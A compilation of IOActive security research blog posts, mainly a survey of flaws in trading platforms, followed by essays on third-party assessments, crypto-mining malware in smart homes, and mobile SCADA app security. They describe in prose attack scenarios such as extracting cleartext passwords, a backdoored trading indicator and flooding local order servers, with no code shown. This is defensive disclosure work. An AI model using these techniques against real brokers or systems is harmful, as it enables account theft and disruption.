The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
Are You Trading Stocks Securely? Exposing Security Flaws in Trading Technologies
By
Alejandro Hernandez
This blog post contains a small portion of the entire analysis. Please refer to the white paper for full details to the research.
Disclaimer
Most of the testing was performed using paper money (demo accounts) provided online by the brokerage houses. Only a few accounts were funded with real money for testing purposes. In the case of commercial platforms, the free trials provided by the brokers were used. Only end-user applications and their direct servers were analyzed. Other backend protocols and related technologies used in exchanges and financial institutions were not tested.
This research is not about High Frequency Trading (HFT), blockchain, or how to get rich overnight.
Introduction
The days of open outcry on trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.
The valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.
Brokerage houses offer trading platforms to operate in the market. These applications allow you to do things including, but not limited to:
Fund your account via bank transfers or credit card
Keep track of your available equity and buying power (cash and margin balances)
Monitor your positions (securities you own) and their performance (profit)
Monitor instruments or indexes
Send buy/sell orders
Create alerts or triggers to be executed when certain thresholds are reached
Receive real-time news or video broadcasts
Stay in touch with the trading community through social media and chats
Needless to say, every single item on the previous list must be kept secret and only known by and shown to its owner.
Scope
My analysis started mid-2017 and concluded in July 2018. It encompassed the following platforms; many of them are some of the most used and well-known trading platforms, and some allow cryptocurrency trading:
16 Desktop applications
34 Mobile apps
30 Websites
These platforms are part of the trading solutions provided by the following brokers, which are used by tens of millions of traders. Some brokers offer the three types of platforms, however, in some cases only one or two were reviewed due to certain limitations:
Ally Financial
AvaTrade
Binance
Bitfinex
Bitso
Bittrex
Bloomberg
Capital One
Charles Schwab
Coinbase
easyMarkets
eSignal
ETNA
eToro
E-TRADE
ETX Capital
ExpertOption
Fidelity
Firstrade
FxPro
GBMhomebroker
Grupo BMV
IC Markets
Interactive Brokers
IQ Option
Kraken
com
Merrill Edge
MetaTrader
Net
NinjaTrader
OANDA
Personal Capital
Plus500
Poloniex
Robinhood
Scottrade
TD Ameritrade
TradeStation
Yahoo! Finance
Devices used:
Windows 7 (64-bit)
Windows 10 Home Single (64-bit)
iOS 10.3.3 (iPhone 6) [not jailbroken]
iOS 10.4 (iPhone 6) [not jailbroken]
Android 7.1.1 (Emulator) [rooted]
Basic security controls/features were reviewed that represent just the tip of the iceberg when compared to more exhaustive lists of security checks per platform.
Results
Unfortunately, the results proved to be much worse compared with applications in retail banking. For example, mobile apps for trading are less secure than the personal banking apps reviewed in 2013 and 2015.
Apparently, cybersecurity has not been on the radar of the Financial Services Tech space in charge of developing trading apps. Security researchers have disregarded these technologies as well, probably because of a lack of understanding of money markets.
While testing I noted a basic correlation: the biggest brokers are the ones that invest more in fintech cybersecurity. Their products are more mature in terms of functionality, usability, and security.
Based on my testing results and opinion, the following trading platforms are the most secure:
Broker
Platforms
TD Ameritrade
Web and mobile
Charles Schwab
Web and mobile
Merrill Edge
Web and mobile
MetaTrader 4/5
Desktop and mobile
Yahoo! Finance
Web and mobile
Robinhood
Web and mobile
Bloomberg
Mobile
TradeStation
Mobile
Capital One
Mobile
FxPro cTrader
Desktop
IC Markets cTrader
Desktop
Ally Financial
Web
Personal Capital
Web
Bitfinex
Web and mobile
Coinbase
Web and mobile
Bitso
Web and mobile
The medium- to high-risk vulnerabilities found on the different platforms include full or partial problems with encryption, Denial of Service, authentication, and/or session management problems. Despite the fact that these platforms implement good security features, they also have areas that should be addressed to improve their security.
Following the platforms I consider must improve in terms of security:
Broker
Platforms
Interactive Brokers
Desktop, web and mobile
IQ Option
Desktop, web and mobile
AvaTrade
Desktop and mobile
E-TRADE
Web and mobile
eSignal
Desktop
TD Ameritrade’s Thinkorwim
Desktop
Charles Schwab
Desktop
TradeStation
Desktop
NinjaTrader
Desktop
Fidelity
Web
Firstrade
Web
Plus500
Web
Markets.com
Mobile
Unencrypted Communications
In 9 desktop applications (64%) and in 2 mobile apps (6%), transmitted data unencrypted was observed. Most applications transmit most of the sensitive data in an encrypted way, however, there were some cases where cleartext data could be seen in unencrypted requests.
Among the data seen unencrypted are passwords, balances, portfolio, personal information and other trading-related data. In most cases of unencrypted transmissions, HTTP in plaintext was seen, and in others, old proprietary protocols or other financial protocols such as FIX were used.
Under certain circumstances, an attacker with access to some part of the network, such as the router in a public WiFi, could see and modify information transmitted to and from the trading application. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.
For example, the follow application uses unencrypted HTTP. In the screenshot, a buy order:
Another interesting example was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data. During the testing, it was noted that Data Manager authenticates over an unencrypted protocol on the TCP port 2189, apparently developed in 1999.
As can be seen, the copyright states it was developed in 1999 by Data Broadcasting Corporation. Doing a quick search, we found a document from the SEC that states the company changed its name to Interactive Data Corporation, the owners of eSignal. In other words, it looks like it is an in-house development created almost 20 years ago. We could not corroborate this information, though.
The main eSignal login screen also authenticates through a cleartext channel:
FIX is a protocol initiated in 1992 and is one of the industry standard protocols for messaging and trade execution. Currently, it is used by a majority of exchanges and traders. There are guidelines on how to implement it through a secure channel, however, the binary version in cleartext was mostly seen. Tests against the protocol itself were not performed in this analysis.
A broker that supports FIX:
There are some cases where the application encrypts the communication channel, except in certain features. For instance, Interactive Brokers desktop and mobile applications encrypt all the communication, but not that used by iBot, the robot assistant that receives text or voice commands, which sends the instructions to the server embedded in a FIX protocol message in cleartext:
News related to the positions were also observed in plaintext:
Another instance of an application that uses encryption but not for certain channels is this one, Interactive Brokers for Android, where a diagnostics log with sensitive data is sent to the server in a scheduled basis through unencrypted HTTP:
A similar platform that sends everything over HTTPS is IQ Option, but for some reason, it sends duplicate unencrypted HTTP requests to the server disclosing the session cookie.
Others appear to implement their own binary protocols, such as Charles Schwab, however, symbols in watchlists or quoted symbols could be seen in cleartext:
Interactive Brokers supports encryption but by default uses an insecure channel; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and some sensitive data will be sent and received without encryption:
Passwords Stored Unencrypted
In 7 mobile apps (21%) and in 3 desktop applications (21%), the user’s password was stored unencrypted in a configuration file or sent to log files. Local access to the computer or mobile device is required to extract them, though. This access could be either physical or through malware.
In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-depth know-how (it’s relatively easily), log in through the web-based trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most web platforms (+75%) support two-factor authentication (2FA), however, it’s not enabled by default, the user must go to the configuration and enable it to receive authorization codes by text messages or email. Hence, if 2FA is not enabled in the account, it’s possible for an attacker, that knows the password already, to link a new bank account and withdraw the money from sold securities.
The following are some instances where passwords are stored locally unencrypted or sent to logs in cleartext:
Base64 is not encryption:
In some cases, the password was sent to the server as a GET parameter, which is also insecure:
One PIN for login and unlocking the app was also seen:
In IQ Option, the password was stored completely unencrypted:
However, in a newer version, the password is encrypted in a configuration file, but is still stored in cleartext in a different file:
Trading and Account Information Stored Unencrypted
In the trading context, operational or strategic data must not be stored unencrypted nor sent to the any log file in cleartext. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.
8 desktop applications (57%) and 15 mobile apps (44%) sent sensitive data in cleartext to log files or stored it unencrypted. Local access to the computer or mobile device is required to extract this data, though. This access could be either physical or through malware.
If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.
The following screenshots show applications that store sensitive data unencrypted:
Balances:
Investment portfolio:
Buy/sell orders:
Watchlists:
Recently quoted symbols:
Other data:
Trading Programming Languages with DLL Import Capabilities
This is not a bug, it’s a feature. Some trading platforms allow their customers to create their own automated trading robots (a.k.a. expert advisors), indicators, and other plugins. This is achieved through their own programming languages, which in turn are based on other languages, such as C++, C#, or Pascal.
The following are a few of the trading platforms with their own trading language:
MetaTrader: MetaQuotes Language (Based on C++ – Supports DLL imports)
NinjaTrader: NinjaScript (Based on C# – Supports DLL imports)
TradeStation: EasyLanguage (Based on Pascal – Supports DLL imports)
AvaTraceAct: ActFX (Based on Pascal – Does not support OS commands nor DLL imports)
(FxPro/IC Markets) cTrader: Based on C# (OS command and DLL support is unknown)
Nevertheless, some platforms such as MetaTrader warn their customers about the dangers related to DLL imports and advise them to only execute plugins from trusted sources. However, there are Internet tutorials claiming, “to make you rich overnight” with certain trading robots they provide. These tutorials also give detailed instructions on how to install them in MetaTrader, including enabling the checkbox to allow DLL imports. Innocent non-tech savvy traders are likely to enable such controls, since not everyone knows what a DLL file is or what is being imported from it. Dangerous.
Following a malicious Ichimoku indicator that, when loaded into any chart, downloads and executes a backdoor for remote access:
Another basic example is NinjaTrader, which simply allows OS commands through C#’s System.Diagnostics.Process.Start(). In the following screenshot, calc.exe executed from the chart initialization routine:
Denial of Service
Many desktop platforms integrate with other trading software through common TCP/IP sockets. Nevertheless, some common weaknesses are present in the connections handling of such services.
A common error is not implementing a limit of the number of concurrent connections. If there is no limit of concurrent connections on a TCP daemon, applications are susceptible to denial-of-service (DoS) or other type of attacks depending on the nature of the applications.
For example, TD Ameritrade’s Thinkorswim TCP-Orders Server listens on the TCP port 2000 in the localhost interface, and there is no limit for connections nor a waiting time between orders. This leads to the following problems:
Memory leakage since, apparently, the resources assigned to every connection are not freed upon termination.
Continuous order pop-ups (one pop-up per order received through the TCP server) render the application useless.
A NULL pointer dereference is triggered and an error report (.zip file) is created.
Regardless, it listens on the local interface only. There are different ways to reach this port, such as XMLHttpRequest() in JavaScript through a web browser.
Memory leakage could be easily triggered by creating as many connections as possible:
A similar DoS vulnerability due to memory exhaustion was found in eSignal’s Data Manager. eSignal is a known signal provider and integrates with a wide variety of trading platforms. It acts as a source of market data; therefore, availability is the most important asset:
It’s recommended to implement a configuration item to allow the user to control the behavior of the TCP order server, such as controlling the maximum number of orders sent per minute as well as the number of seconds to wait between orders to avoid bottlenecks.
The following capture from Interactive Brokers shows when this countermeasure is implemented properly. No more than 51 users can be connected simultaneously:
Session Still Valid After Logout
Normally, when the logout button is pressed in an app, the session is finished on both sides: server and client. Usually the server deletes the session token from its valid session list and sends a new empty or random value back to the client to clear or overwrite the session token, so the client needs to reauthenticate next time.
In some web platforms such as E-TRADE, Charles Schwab, Fidelity and Yahoo! Finance (Fixed), the session was still valid one hour after clicking the logout button:
Authentication
While most web-based trading platforms support 2FA (+75%), most desktop applications do not implement it to authenticate their users, even when the web-based platform from the same broker supports it.
Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only 8 apps (24%) do not implement this feature.
Unfortunately, using the fingerprint database in the phone has a downside:
Weak Password Policies
Some institutions let the users choose easily guessable passwords. For example:
The lack of a secure password policy increases the chances that a brute-force attack will succeed in compromising user accounts.
In some cases, such as in IQ Option and Markets.com, the password policy validation is implemented on the client-side only, hence, it is possible to intercept a request and send a weak password to the server:
Automatic Logout/Lockout for Idle Sessions
Most web-based platforms logout/lockout the user automatically, but this is not the case for desktop (43%) and mobile apps (25%). This is a security control that forces the user to authenticate again after a period of idle time.
Privacy Mode
This mode protects the customers’ private information from being displayed on the screen in public areas where shoulder-surfing attacks are feasible. Most of the mobile apps, desktop applications, and web platforms do not implement this useful and important feature.
The following images show before and after enabling privacy mode in Thinkorswim for mobile:
Hardcoded Secrets in Code and App Obfuscation
16 Android .apk installers (47%) were easily reverse engineered to human-readable code since they lack of obfuscation. Most Java and .NET-based desktop applications were also reverse-engineered easily. The rest of the applications had medium to high levels of obfuscation, such as Merrill Edge in the next screenshot.
The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.
In the non-obfuscated platforms, there are hardcoded secrets such as cryptographic keys and third-party service partner passwords. This information could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, 14 of the mobile apps (41%) and 4 of the desktop platforms (29%) have traces (hostnames and IPs) about the internal development and testing environments where they were made or tested. Some hostnames are reachable from the Internet and since they’re testing systems they could lack of proper protections.
SSL Certificate Validation
11 of the reviewed mobile apps (32%) do not check the authenticity of the remote endpoint by verifying its SSL certificate; therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on their phones, though.
The ones that verify the certificate normally do not transmit any data, however, only Charles Schwab allows the user to use the app with the provided certificate:
Lack of Anti-exploitation Mitigations
ASLR randomizes the virtual address space locations of dynamically loaded libraries. DEP disallows the execution of data in the data segment. Stack Canaries are used to identify if the stack has been corrupted. These security features make much more difficult for memory corruption bugs to be exploited and execute arbitrary code.
The majority of the desktop applications do not have these security features enabled in their final releases. In some cases, that these features are only enabled in some components, not the entire application. In other cases, components that handle network connections also lack these flags.
Linux applications have similar protections. IQ Option for Linux does not enforce all of them on certain binaries.
Other Weaknesses
More issues were found in the platforms. For more details, please refer to the white paper.
Statistics
Since a picture is worth a thousand words, consider the following graphs:
For more statistics, please refer to the white paper.
Responsible Disclosure
One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure. In September 2017 we sent a detailed report to 13 of the brokerage firms whose mobile trading apps presented some of the higher risks vulnerabilities discussed in this paper. More recently, between May and July 2018, we sent additional vulnerability reports to brokerage firms.
As of July 27, 2018, 19 brokers that have medium- or high-risk vulnerabilities in any of their platforms were contacted.
TD Ameritrade and Charles Schwab were the brokers that communicated more with IOActive for resolving the reported issues.
For a table with the current status of the responsible disclosure process, please refer to the white paper.
Conclusions and Recommendations
Trading platforms are less secure than the applications seen in retail banking.
There’s still a long way to go to improve the maturity level of security in trading technologies.
End users should enable all the security mechanisms their platforms offer, such as 2FA and/or biometric authentication and automatic lockout/logout. Also, it’s recommended not to trade while connected to public networks and not to use the same password for other financial services.
Brokerage firms should perform regular internal audits to continuously improve the security of their trading platforms.
Brokerage firms should also offer security guidance in their online education centers.
Developers should analyze their current applications to determine if they suffer from the vulnerabilities described in this paper, and if so, fix them.
Developers should design new, more secure financial software following secure coding practices.
Regulators should encourage brokers to implement safeguards for a better trading environment. They could also create trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
Rating organizations should include security in their reviews.
Side Note
Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.
With nothing left to say, I wish you happy and secure trading!
Security Theater and the Watch Effect in Third-party Assessments
By
Daniel Miessler
Before the facts were in, nearly every journalist and salesperson in infosec was thinking about how to squeeze lemonade from the Equifax breach. Let’s be honest – it was and is a big breach. There are lessons to be learned, but people seemed to have the answers before the facts were available.
It takes time to dissect these situations and early speculation is often wrong. Efforts at attribution and methods take months to understand. So, it’s important to not buy into the hysteria and, instead, seek to gain a clear vision of the actual lessons to be learned. Time and again, these supposed “watershed moments” and “wake-up calls” generate a lot of buzz, but often little long-term effective action to improve operational resilience against cyber threats.
At IOActive we guard against making on-the-spot assumptions. We consider and analyze the actual threats, ever mindful of the “Watch Effect.” The Watch Effect can be simply explained: you wear a watch long enough, you can’t even feel it.
I won’t go into what third-party assessments Equifax may or may not have had because that’s largely speculation. The company has probably been assessed many times, by many groups with extensive experience in the prevention of cyber threats and the implementation of active defense. And they still experienced a deep impact cyber incursion.
The industry-wide point here is: Everyone is asking everyone else for proof that they’re secure.
The assumption and Watch Effect come in at the point where company executives think their responses to high-level security questions actually mean something.
Well, sure, they do mean something. In the case of questionnaires, you are asking a company to perform a massive amount of tedious work, and, if they respond with those questions filled in, and they don’t make gross errors or say “no” where they should have said “yes”, that probably counts for something.
But the question is how much do we really know about a company’s security by looking at their responses to a security questionnaire?
The answer is, “not much.”
As a company that has been security testing for 20 years now, IOActive has successfully breached even the most advanced cyber defenses across countless companies during penetration tests that were certified backwards and forwards by every group you can imagine. So, the question to ask is, “Do questionnaires help at all? And if so, how much?”
Here’s a way to think about that.
At IOActive we conduct full, top-down security reviews of companies that include business risk, crown-jewel defense, and every layer that these pieces touch. Because we know how attackers get in, we measure and test how effective the company is at detecting and responding to cyber events – and use this comprehensive approach to help companies understand how to improve their ability to prevent, detect, and ever so critically, RESPOND to intrusions. Part of that approach includes a series of interviews with everyone from the C-suite to the people watching logs. What we find is frightening.
We are often days or weeks into an assessment before we discover a thread to pull that uncovers a major risk, whether that thread comes from a technical assessment or a person-to-person interview or both.
That’s days—or weeks—of being onsite with full access to the company as an insider.
Here’s where the Watch Effect comes in. Many of the companies have no idea what we’re uncovering or how bad it is because of the Watch Effect. They’re giving us mostly standard answers about their day-to-day, the controls they have in place, etc. It’s not until we pull the thread and start probing technically – as an attacker – that they realize they’re wearing a broken watch.
Then they look down at a set of catastrophic vulnerabilities on their wrist and say, “Oh. That’s a problem.”
So, back to the questionnaire…
If it takes days or weeks for an elite security firm to uncover these vulnerabilities onsite with full cooperation during an INTERNAL assessment, how do you expect to uncover those issues with a form?
You can’t. And you should stop pretending you can. Questionnaires depend far too much upon the capability and knowledge of the person or team filling it out, and often are completed with impartial knowledge. How would one know if a firewall rule were updated improperly to “any/any” in the last week if it is not tested and verified?
To be clear, the problem isn’t that third party assessments only give 2/10 in security assessment value. The problem is that executives THINK it’s giving them 6/10, or 9/10.
It’s that disconnect that’s causing the harm.
Eventually, companies will figure this out. In the meantime, the breaches won’t stop.
Until then, we as technical practitioners can do our best to convince our clients and prospects to understand the value these types of cursory, external glances at a company provide. Very little. So, let’s prioritize appropriately.
There are many tiny elements to cryptocurrency that are not getting the awareness time they deserve. To start, the very thing that attracts people to cryptocurrency is also the very thing that is seemingly overlooked as a challenge. Cryptocurrencies are not backed by governments or institutions. The transactions allow the trader or investor to operate with anonymity. We have seen a massive increase in the last year of cyber bad guys hiding behind these inconspicuous transactions – ransomware demanding payment in bitcoin; bitcoin ATMs being used by various dealers to effectively clean money.
Because there are few regulations governing crypto trading, we cannot see if cryptocurrency is being used to fund criminal or terrorist activity. There is an ancient funds transfer capability, designed to avoid banks and ledgers called Hawala. Hawala is believed to be the method by which terrorists are able to move money, anonymously, across borders with no governmental controls. Sound like what’s happening with cryptocurrency? There’s an old saying in law enforcement – follow the money. Good luck with that one.
Many people don’t realize that cryptocurrencies depend on multiple miners. This allows the processing to be spread out and decentralized. Miners validate the integrity of the transactions and as a result, the miners receive a “block reward” for their efforts. But, these rewards are cut in half every 210,000 blocks. A bitcoin block reward when it first started in 2009 was 50 BTC, today it’s 12.5. There are about 1.5 million bitcoins left to mine before the reward halves again.
This limit on total bitcoins leads to an interesting issue – as the reward decreases, miners will switch their attention from bitcoin to other cryptocurrencies. This will reduce the number of miners, therefore making the network more centralized. This centralization creates greater opportunity for cyber bad guys to “hack” the network and wreak havoc, or for the remaining miners to monopolize the mining.
At some point, and we are already seeing the early stages of this, governments and banks will demand to implement more control. They will start to produce their own cryptocurrency. Would you trust these cryptos? What if your bank offered loans in Bitcoin, Ripple or Monero? Would you accept and use this type of loan?
Because it’s a limited resource, what happens when we reach the 21 million bitcoin limit? Unless we change the protocols, this event is estimated to happen by 2140. My first response – I don’t think bitcoins will be at the top of my concerns list in 2140.
The Interconnected Home
So what does crypto-mining malware or mineware have to do with your home? It’s easy enough to notice if your laptop is being overused – the device slows down, the battery runs down quickly. How can you tell if your fridge or toaster are compromised? With your smart home now interconnected, what happens if the cyber bad guys operate there? All a cyber bad guy needs is electricity, internet and CPU time. Soon your fridge will charge your toaster a bitcoin for bread and butter. How do we protect our unmonitored devices from this mineware? Who is responsible for ensuring the right level of security on your home devices to prevent this?
Smart home vulnerabilities present a real and present danger. We have already seen baby monitors, robots, and home security products, to name a few, all compromised. Most by IOActive researchers. There can be many risks that these compromises introduce to the home, not just around cryptocurrency. Think about how the interconnected home operates. Any device that’s SMART now has the three key ingredients to provide the cyber bad guy with everything he needs – internet access, power and processing.
Firstly, I can introduce my mineware via a compromised mobile phone and start to exploit the processing power of your home devices to mine bitcoin. How would you detect this? When could you detect this? At the end of the month when you get an electricity bill. Instead of 50 pounds a month, its now 150 pounds. But how do you diagnose the issue? You complain to the power company. They show you the usage. It’s correct. Your home IS consuming that power.
They say that crypto mining is now using as much power as a small country. That’s got a serious impact on the power infrastructure as well as the environment. Ahhhh you say, I have a smart meter, it can give me a real time read out of my usage. Yes, it’s a computer. And, if I’m a cyber bad guy, I can make that computer tell me the latest football scores if I want. The key for a corporation when a cyber bad guy is attacking is to reduce dwell time. Detect and stop the bad guy from playing in your network. There are enterprise tools that can perform these tasks, but do you have these same tools at home? How would you Detect and React to a cyber bad guy attacking your smart home?
IOActive has proven these attack vectors over and over. We know this is possible and we know this is almost impossible to detect. Remember, a cyber bad guy makes several assessments when deciding on an attack – the risk of detection, the reward for the effort, and the penalty for capture. The risk of detection is low, like very low. The reward, well you could be mining blocks for months without stopping, that’s tens of thousands of dollars. And the penalty… what’s the penalty for someone hacking your toaster… The impact is measurable to the homeowner. This is real, and who’s to say not happening already. Ask your fridge!!
What’s the Answer – Avoid Using Smart Home Devices Altogether?
No, we don’t believe the best defense is to avoid adopting this new technology. The smart and interconnected home can offer its users fantastic opportunities. We believe that the responsibility rests with the manufacturer to ensure that devices are designed and built in a safe and secure way. And, yes, everything is designed; few things are designed well.IOActive researchers spend 99% of their time trying to identify vulnerabilities in these devices for the safety of everyone, not just corporations. The power is in the hands of the consumer. As soon as the consumer starts to purchase products based not only on their power efficiency, but their security rating as well, then we will see a shift into a more secure home.
In the meantime, consider the entry point for most cyber bad guys. Generally, this is your desktop, laptop or mobile device. Therefore, ensure you have suitable security products running on these devices, make sure they are patched to the correct levels, be conscious of the websites you are visiting. If you control the available entry points, you will go a long way to protecting your home.
Two years ago, we assessed 20 mobile applications that worked with ICS software and hardware. At that time, mobile technologies were widespread, but Internet of Things (IoT) mania was only starting. Our research concluded the combination of SCADA systems and mobile applications had the potential to be a very dangerous and vulnerable cocktail. In the introduction of our paper, we stated “convenience often wins over security. Nowadays, you can monitor (or even control!) your ICS from a brand-new Android [device].”
Today, no one is surprised at the appearance of an IIoT. The idea of putting your logging, monitoring, and even supervisory/control functions in the cloud does not sound as crazy as it did several years ago. If you look at mobile application offerings today, many more ICS- related applications are available than two years ago. Previously, we predicted that the “rapidly growing mobile development environment” would redeem the past sins of SCADA systems. The purpose of our research is to understand how the landscape has evolved and assess the security posture of SCADA systems and mobile applications in this new IIoT era.
SCADA and Mobile Applications ICS infrastructures are heterogeneous by nature. They include several layers, each of which is dedicated to specific tasks. Figure 1 illustrates a typical ICS structure.
Figure 1: Modern ICS infrastructure including mobile apps
Mobile applications reside in several ICS segments and can be grouped into two general families: Local (control room) and Remote.
Local Applications Local applications are installed on devices that connect directly to ICS devices in the field or process layers (over Wi-Fi, Bluetooth, or serial). Remote Applications Remote applications allow engineers to connect to ICS servers using remote channels, like the Internet, VPN-over-Internet, and private cell networks. Typically, they only allow monitoring of the industrial process; however, several applications allow the user to control/supervise the process. Applications of this type include remote SCADA clients, MES clients, and remote alert applications. In comparison to local applications belonging to the control room group, which usually operate in an isolated environment, remote applications are often installed on smartphones that use Internet connections or even on personal devices in organizations that have a BYOD policy. In other words, remote applications are more exposed and face different threats.
Unauthorized physical access to the device or “virtual” access to device data
Communication channel compromise (MiTM)
Application compromise
Table 1 summarizes the threat types.
Table 1: SCADA mobile client threat list
Attack Types
Based on the threats listed above, attacks targeting mobile SCADA applications can be sorted into two groups.
Directly/indirectly influencing an industrial process or industrial network infrastructure
This type of attack could be carried out by sending data that would be carried over to the field segment devices. Various methods could be used to achieve this, including bypassing ACL/ permissions checks, accessing credentials with the required privileges, or bypassing data validation.
Compromising a SCADA operator to unwillingly perform a harmful action on the system
The core idea is for the attacker to create environmental circumstances where a SCADA system operator could make incorrect decisions and trigger alarms or otherwise bring the system into a halt state.
Testing Approach
Similar to the research we conducted two years ago, our analysis and testing approach was based on the OWASP Mobile Top 10 2016. Each application was tested using the following steps:
Perform analysis and fill out the test checklist
Perform client and backend fuzzing
If needed, perform deep analysis with reverse engineering
We did not alter the fuzzing approach since the last iteration of this research. It was discussed in depth in our previous whitepaper, so its description is omitted for brevity.
We improved our test checklist for this assessment. It includes:
Application purpose, type, category, and basic information
Permissions
Password protection
Application intents, exported providers, broadcast services, etc.
Native code
Code obfuscation
Presence of web-based components
Methods of authentication used to communicate with the backend
Correctness of operations with sessions, cookies, and tokens
SSL/TLS connection configuration
XML parser configuration
Backend APIs
Sensitive data handling
HMI project data handling
Secure storage
Other issues
Reviewed Vendors
We analyzed 34 vendors in our research, randomly selecting SCADA application samples from the Google Play Store. We did, however, favor applications for which we were granted access to the backend hardware or software, so that a wider attack surface could be tested.
Additionally, we excluded applications whose most recent update was before June 2015, since they were likely the subject of our previous work. We only retested them if there had been an update during the subsequent two years.
Findings
We identified 147 security issues in the applications and their backends. We classified each issue according to the OWASP Top Ten Mobile risks and added one additional category for backend software bugs.
Table 4 presents the distribution of findings across categories. The “Number of Issues” column reports the number of issues belonging to each category, while the “% of Apps” column reports how many applications have at least one vulnerability belonging to each category.
Table 4. Vulnerabilities statistics
In our white paper, we provide an in-depth analysis of each category, along with examples of the most significant vulnerabilities we identified. Please download the white paper for a deeper analysis of each of the OWASP category findings. Remediation And Best Practices In addition to the well-known recommendations covering the OWASP Top 10 and OWASP Mobile Top 10 2016 risks, there are several actions that could be taken by developers of mobile SCADA clients to further protect their applications and systems. In the following list, we gathered the most important items to consider when developing a mobile SCADA application:
Always keep in mind that your application is a gateway to your ICS systems. This should influence all of your design decisions, including how you handle the inputs you will accept from the application and, more generally, anything that you will accept and send to your ICS system.
Avoid all situations that could leave the SCADA operators in the dark or provide them with misleading information, from silent application crashes to full subverting of HMI projects.
Follow best practices. Consider covering the OWASP Top 10, OWASP Mobile Top 10 2016, and the 24 Deadly Sins of Software Security.
Do not forget to implement unit and functional tests for your application and the backend servers, to cover at a minimum the basic security features, such as authentication and authorization requirements.
Enforce password/PIN validation to protect against threats U1-3. In addition, avoid storing any credentials on the device using unsafe mechanisms (such as in cleartext) and leverage robust and safe storing mechanisms already provided by the Android platform.
Do not store any sensitive data on SD cards or similar partitions without ACLs at all costs Such storage mediums cannot protect your sensitive data.
Provide secrecy and integrity for all HMI project data. This can be achieved by using authenticated encryption and storing the encryption credentials in the secure Android storage, or by deriving the key securely, via a key derivation function (KDF), from the application password.
Encrypt all communication using strong protocols, such as TLS 1.2 with elliptic curves key exchange and signatures and AEAD encryption schemes. Follow best practices, and keep updating your application as best practices evolve. Attacks always get better, and so should your application.
Catch and handle exceptions carefully. If an error cannot be recovered, ensure the application notifies the user and quits gracefully. When logging exceptions, ensure no sensitive information is leaked to log files.
If you are using Web Components in the application, think about preventing client-side injections (e.g., encrypt all communications, validate user input, etc.).
Limit the permissions your application requires to the strict minimum.
Implement obfuscation and anti-tampering protections in your application.
Conclusions Two years have passed since our previous research, and things have continued to evolve. Unfortunately, they have not evolved with robust security in mind, and the landscape is less secure than ever before. In 2015 we found a total of 50 issues in the 20 applications we analyzed and in 2017 we found a staggering 147 issues in the 34 applications we selected. This represents an average increase of 1.6 vulnerabilities per application. We therefore conclude that the growth of IoT in the era of “everything is connected” has not led to improved security for mobile SCADA applications. According to our results, more than 20% of the discovered issues allow attackers to directly misinform operators and/or directly/ indirectly influence the industrial process.
In 2015, we wrote:
SCADA and ICS come to the mobile world recently, but bring old approaches and weaknesses. Hopefully, due to the rapidly developing nature of mobile software, all these problems will soon be gone.
We now concede that we were too optimistic and acknowledge that our previous statement was wrong. Over the past few years, the number of incidents in SCADA systems has increased and the systems become more interesting for attackers every year. Furthermore, widespread implementation of the IoT/IIoT connects more and more mobile devices to ICS networks. Thus, the industry should start to pay attention to the security posture of its SCADA mobile applications, before it is too late. For the complete analysis, please download our white paper here. Acknowledgments
Many thanks to Dmitriy Evdokimov, Gabriel Gonzalez, Pau Oliva, Alfredo Pironti, Ruben Santamarta, and Tao Sauvage for their help during our work on this research.
About Us
Alexander Bolshev
Alexander Bolshev is a Security Consultant for IOActive. He holds a Ph.D. in computer security and works as an assistant professor at Saint-Petersburg State Electrotechnical University. His research interests lie in distributed systems, as well as mobile, hardware, and industrial protocol security. He is the author of several white papers on topics of heuristic intrusion detection methods, Server Side Request Forgery attacks, OLAP systems, and ICS security. He is a frequent presenter at security conferences around the world, including Black Hat USA/EU/UK, ZeroNights, t2.fi, CONFIdence, and S4.
Ivan Yushkevich
Ivan is the information security auditor at Embedi (http://embedi.com). His main area of interest is source code analysis for applications ranging from simple websites to enterprise software. He has vast experience in banking systems and web application penetration testing.
IOActive
IOActive is a comprehensive, high-end information security services firm with a long and established pedigree in delivering elite security services to its customers. Our world-renowned consulting and research teams deliver a portfolio of specialist security services ranging from penetration testing and application code assessment through to semiconductor reverse engineering. Global 500 companies across every industry continue to trust IOActive with their most critical and sensitive security issues. Founded in 1998, IOActive is headquartered in Seattle, USA, with global operations through the Americas, EMEA and Asia Pac regions. Visit for more information. Read the IOActive Labs Research Blog. Follow IOActive on Twitter.
Embedi
Embedi expertise is backed up by extensive experience in security of embedded devices, with special emphasis on attack and exploit prevention. Years of research are the genesis of the software solutions created. Embedi developed a wide range of security products for various types of embedded/smart devices used in different fields of life and industry such as: wearables, smart home, retail environments, automotive, smart buildings, ICS, smart cities, and others. Embedi is headquartered in Berkeley, USA. Visit for more information and follow Embedi on Twitter.
